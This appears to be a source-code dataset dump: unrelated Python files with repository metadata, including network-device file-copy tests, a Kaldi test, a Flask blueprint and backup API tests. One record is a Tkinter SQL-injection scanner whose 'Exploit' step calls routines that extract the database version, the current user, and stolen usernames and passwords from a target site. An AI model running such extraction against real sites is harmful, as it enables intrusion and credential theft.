used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 100000000000000000
result = self.fc.enough_remote_space()
self.assertEqual(result, False)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_exists(self, mock_isfile):
mock_isfile.return_value = True
result = self.fc.local_file_exists()
expected = True
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_doesnt_exist(self, mock_isfile):
mock_isfile.return_value = False
result = self.fc.local_file_exists()
expected = False
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'b211e79fbaede5859ed2192b0fc5f1d5'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, True)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_doesnt_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'abcdef12345'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, False)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
def test_remote_file_doesnt_exists(self):
self.device.show.return_value = 'No such file'
result = self.fc.remote_file_exists()
self.assertEqual(result, False)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
def test_remote_file_exists(self):
self.device.show.return_value = ' 5 Mar 23 00:48:15 2016 smallfile\nUsage for bootflash://sup-local\n 2425630720 bytes used\n19439788032 bytes free\n21865418752 bytes total\n'
result = self.fc.remote_file_exists()
self.assertEqual(result, True)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_get_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.get()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.get.assert_called_with('bootflash:source_file', '/path/to/source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_local_not_exist(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = False
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_not_enough_space(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = False
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_transfer_error(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
mock_SCP.return_value.put.side_effect = Exception
with self.assertRaises(FileTransferError):
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
if __name__ == "__main__":
unittest.main()
| 0
| 16,132
| 0
| 5,426
| 0
| 0
| 0
| 52
| 90
|
1ba7e9d00ac9ddde32d332f71e982fac582852a8
| 1,154
|
py
|
Python
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | 1
|
2017-12-08T15:55:17.000Z
|
2017-12-08T15:55:17.000Z
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 26.837209
| 89
| 0.738302
|
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 22
|
0892a02aefb143a24befa8f3ebf7c11b8155f8f2
| 1,794
|
py
|
Python
|
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
# 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
| 32.618182
| 105
| 0.672241
|
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
def parse_args(args):
try:
height = int(args.get('height')[0])
except:
height = DEFAULT_PLOT_HEIGHT
try:
width = int(args.get('width')[0])
except:
width = DEFAULT_PLOT_WIDTH
try:
labeling_job_name = args.get('labeling_job_name')[0].decode('utf-8')
except:
print('A labeling job query parameter is required e.g, labeling_job_name=a-test-job-name')
exit(1)
try:
bucket = args.get('bucket')[0].decode('utf-8')
except:
print('A bucket query parameter is required e.g, bucket=an-s3-bucket-name')
exit(1)
try:
prefix = args.get('prefix')[0].decode('utf-8')
except:
print('A prefix parameter is required e.g, prefix=a/prefix/job-name/annotations/worker-response')
exit(1)
try:
user_pool_id = args.get('user_pool_id')[0].decode('utf-8')
except:
print('A user_pool_id parameter is required e.g, user_pool_id=us-west-2_adfsdasf')
exit(1)
return height, width, labeling_job_name, bucket, prefix, user_pool_id
| 2
| 0
| 0
| 0
| 0
| 1,062
| 0
| 0
| 23
|
ae7b9a5ad2f42b1085d8218767395ee08e327173
| 5,994
|
py
|
Python
|
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | 1
|
2018-10-28T17:47:24.000Z
|
2018-10-28T17:47:24.000Z
|
Home()
| 41.625
| 127
| 0.656823
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
def checkvuln(wsite,name):
inject=[]
global result
for x in name:
sqlinject=x
inject.append(wsite.replace("FUZZ",sqlinject))
showinfo('Wait'," Checking website for vulnerability please wait")
result=injector(inject)
process()
def deepXploit():
global columns
global version
global curr_user
global steal_usr
global passwrd
columns=detect_columns(wsite)
version=detect_version(wsite)
curr_user=detect_user(wsite)
steal_usr,passwrd=steal_users(wsite)
def xploit():
pro.destroy()
xploy=Tk()
showinfo('Exploit', "website is under deep Explotation wait ..!")
xploy.geometry('1024x577')
xploy.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
xploy.title("SQL Injection Vulnerability Scanner")
Label(xploy,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
Label(xploy,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(xploy,text='Results:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
Label(xploy,text='No. of columns:-', font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=0)
Label(xploy,text='Version:-', font='Harrington 14 bold underline' ,bg='white').grid(row=7,column=0)
Label(xploy,text='Current Database User:-', font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=0)
## Label(xploy,text='Usernames & passwords:-', font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=0)
for x in columns:
Label(xploy, text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=(1+(int(columns.index(x)))))
## xploy.mainloop()
Label(xploy, text=version,font='Harrington 14 bold underline',bg='white').grid(row=7,column=1)
Label(xploy, text=curr_user,font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=1)
## for x in steal_usr:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=(1+(int(steal_usr.index(x)))))
## xploy.mainloop()
## for x in passwrd:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=11,column=(1+(int(passwrd.index(x)))))
## xploy.mainloop()
xploy.mainloop()
def report():
p1.destroy()
global rep
rep=Tk()
rep.geometry('1024x577')
rep.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
rep.title("SQL Injection Vulnerability Scanner")
Label(rep,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
Label(rep,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Button(rep, text="back", bg='white', command=repback).grid(row=1, column=8)
Label(rep,text='Report:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
rep.mainloop()
def repback():
rep.destroy()
Home()
def process():
global pro
p1.destroy()
pro=Tk()
pro.geometry('1024x577')
pro.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(pro,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
pro.title("SQL Injection Vulnerability Scanner")
Label(pro,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=1,column=0,columnspan=10)
Label(pro,text='Processing:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0,sticky='W')
Label(pro,text='Testing errors:-', font='Harrington 14 bold ' ,bg='white').grid(row=3,column=0,sticky='W')
'''def testres(wsite,name):
inject=[]
for z in name:
y=(wsite.replace("FUZZ",z))
Label(pro,text='' , bg='white').grid(row=4,column=0,sticky='EWNS')
Label(pro,text=y, bg='white').grid(row=4,column=0,sticky='EW')
break'''
global i
i=int(0)
for x in result:
i=int(i+1)
Label(pro,text=x,font='Harrington 12 bold',bg='white').grid(row=5+i,column=0,sticky='NS')
if (len(result) != 0):
showinfo('Results','Website is vulnerable to sql injection')
Button(pro,text='Exploit',bg='white',command=lambda:[deepXploit(),xploit(),]).grid(row=10,column=5,sticky='W')
else :
showinfo('Results','Website is not vulnerable to sql injection')
pro.mainloop()
def checkres():
if not result:
showinfo('Results',"Not vulnerable")
def Home():
global p1
p1=Tk()
global s
p1.geometry('1024x577')
p1.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(p1,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
p1.title("SQL Injection Vulnerability Scanner")
Label(p1,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(p1,text='Website:', font='Harrington 14 bold' ,bg='white').grid(row=2,column=0)
s=Entry(p1,bg='LightCyan4', cursor='dot')
s.grid(row=2,column=1,columnspan=5,sticky='EW')
Label(p1,text='Injection file select:', font='Harrington 14 bold' ,bg='white').grid(row=8,column=0)
def fileselect():
injectionfile=askopenfilename(title = "Select injection dictionary file",filetypes = (("text files","*.txt"),))
f = open(injectionfile, "r")
global name
name = f.read().splitlines()
print(name)
def webget():
global wsite
wsite=str(s.get()+"FUZZ")
print(wsite)
Button(p1, text='select file', command=fileselect, bg='white', cursor='dot').grid(row=8, column=1)
Button(p1, text="Check",bg='white',command=lambda:[webget(),checkvuln(wsite,name),]).grid(row=6,column=8, sticky='EWNS')
p1.mainloop()
Home()
| 0
| 0
| 0
| 0
| 0
| 5,646
| 0
| 1
| 331
|
1f013a9bb78006e16890563e1f2078779f4852ab
| 3,131
|
py
|
Python
|
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
if __name__ == '__main__':
unittest.main()
| 29.537736
| 71
| 0.545513
|
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
class TestFloatSubMatrix(unittest.TestCase):
def test_from_numpy(self):
num_rows = 5
num_cols = 6
data = np.arange(num_rows * num_cols).reshape(
num_rows, num_cols).astype(np.float32)
# =============================================================
# build a FloatSubMatrix() from a numpy array; memory is shared
# -------------------------------------------------------------
m = kaldi.FloatSubMatrix(data)
self.assertEqual(m.NumRows(), num_rows)
self.assertEqual(m.NumCols(), num_cols)
self.assertEqual(m.Stride(), data.strides[0] / 4)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], data[r, c])
# memory is shared between numpy array and FloatSubMatrix
for r in range(num_rows):
for c in range(num_cols):
m[r, c] += 10
self.assertEqual(m[r, c], data[r, c])
# =============================================================
# Convert a FloatSubMatrix to a numpy array; memory is shared
# -------------------------------------------------------------
m_reference_count = sys.getrefcount(m)
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10 # m is also changed because of memory sharing
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestFloatMatrix(unittest.TestCase):
def test_to_numpy(self):
# first, build a kaldi matrix
num_rows = 6
num_cols = 8
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], 0)
m_reference_count = sys.getrefcount(m)
# now to numpy; memory is shared
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestGeneralMatrix(unittest.TestCase):
def test_from_base_matrix(self):
num_rows = 5
num_cols = 6
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
mg = kaldi.GeneralMatrix(m)
mi = kaldi.FloatMatrix()
mg.GetMatrix(mi)
self.assertEqual(mi.NumRows(), num_rows)
self.assertEqual(mi.NumCols(), num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(mi[r, c], 0)
if __name__ == '__main__':
unittest.main()
| 0
| 0
| 0
| 2,758
| 0
| 0
| 0
| -12
| 115
|
17e2ec4a244bb94a85b8daab658bef83ab4ca1af
| 1,982
|
py
|
Python
|
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp = Blueprint('manage_lists', __name__)
| 33.033333
| 89
| 0.701816
|
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
| 0
| 1,462
| 0
| 0
| 0
| 0
| 0
| 202
| 245
|
5e309a053528b67904d5d5112db0bd96f00b89b5
| 1,204
|
py
|
Python
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 8
|
2020-12-28T12:49:50.000Z
|
2021-04-12T13:49:19.000Z
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | null | null | null |
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 4
|
2021-01-12T07:48:11.000Z
|
2021-04-12T13:49:21.000Z
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
| 30.1
| 85
| 0.649502
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
def __init__(self):
self.page_num = 0
def open(self, file_path):
self.filename, _ = os.path.splitext(os.path.basename(file_path))
self.pdf = pdfplumber.open(file_path)
self.pdf_reader = PdfFileReader(file_path)
self.page_num = self.pdf_reader.getNumPages()
def get_text(self, page):
pdf_page = self.pdf.pages[page]
return pdf_page.extract_text()
def split(self, page, folder):
mkdir(folder)
pdf_writer = PdfFileWriter()
pdf_writer.addPage(self.pdf_reader.getPage(page))
with open(os.path.join(folder, f"{self.filename}-p{page}.pdf"), "wb") as out:
pdf_writer.write(out)
def merge(self, pdfs, merged_name):
merger = PdfFileMerger()
for pdf in pdfs:
merger.append(PdfFileReader(pdf))
merger.write(f"{merged_name}.pdf")
| 0
| 0
| 0
| 911
| 0
| 0
| 0
| 37
| 111
|
7d8042e0a0e082248ae3fb8d16b1773619abf452
| 3,510
|
py
|
Python
|
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
| 35.454545
| 118
| 0.74188
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
class BackupsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Backups(self.connection)
@mock.patch.object(ResourceClient, 'get_collection')
def test_get_all_called_once(self, mock_get_collection):
self._client.get_all()
mock_get_collection.assert_called_once_with('/rest/backups')
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._client.get('appliance_backup_2017-04-20_180138')
mock_get.assert_called_once_with('appliance_backup_2017-04-20_180138')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/backups/appliance_backup_2017-04-20_180138'
self._client.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'create_with_zero_body')
def test_create_called_once(self, mock_create):
mock_create.return_value = {}
self._client.create()
mock_create.assert_called_once_with(timeout=-1)
@mock.patch.object(ResourceClient, 'download')
def test_download_called_once_by_id(self, mock_download):
download_uri = '/rest/backups/archive/appliance_backup_2017-04-20_182809'
destination = 'appliance_backup_2017-04-20_180138.bkp'
self._client.download(download_uri, destination)
mock_download.assert_called_once_with('/rest/backups/archive/appliance_backup_2017-04-20_182809', destination)
@mock.patch.object(ResourceClient, 'upload')
def test_upload_artifact_bundle_called_once(self, mock_upload):
filepath = "appliance_backup_2017-04-20_182809.bkp"
self._client.upload(filepath)
mock_upload.assert_called_once_with(filepath)
@mock.patch.object(ResourceClient, 'get')
def test_get_config_called_once(self, mock_get):
self._client.get_config()
mock_get.assert_called_once_with('config')
@mock.patch.object(ResourceClient, 'update')
def test_update_config_called_once(self, mock_update):
options = {"enabled": False}
self._client.update_config(options, timeout=30)
mock_update.assert_called_once_with(options, uri='/rest/backups/config', timeout=30)
@mock.patch.object(ResourceClient, 'update_with_zero_body')
def test_update_remote_archive_called_once(self, mock_update):
save_uri = '/rest/backups/remotearchive/appliance_backup_2017-04-20_182809'
self._client.update_remote_archive(save_uri, timeout=30)
mock_update.update_with_zero_body(uri=save_uri, timeout=30)
| 0
| 2,244
| 0
| 399
| 0
| 0
| 0
| 89
| 136
|
4bc85f8092188613ab654a4c3765404fe3fb867c
| 672
|
py
|
Python
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | 1
|
2017-07-12T16:44:02.000Z
|
2017-07-12T16:44:02.000Z
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
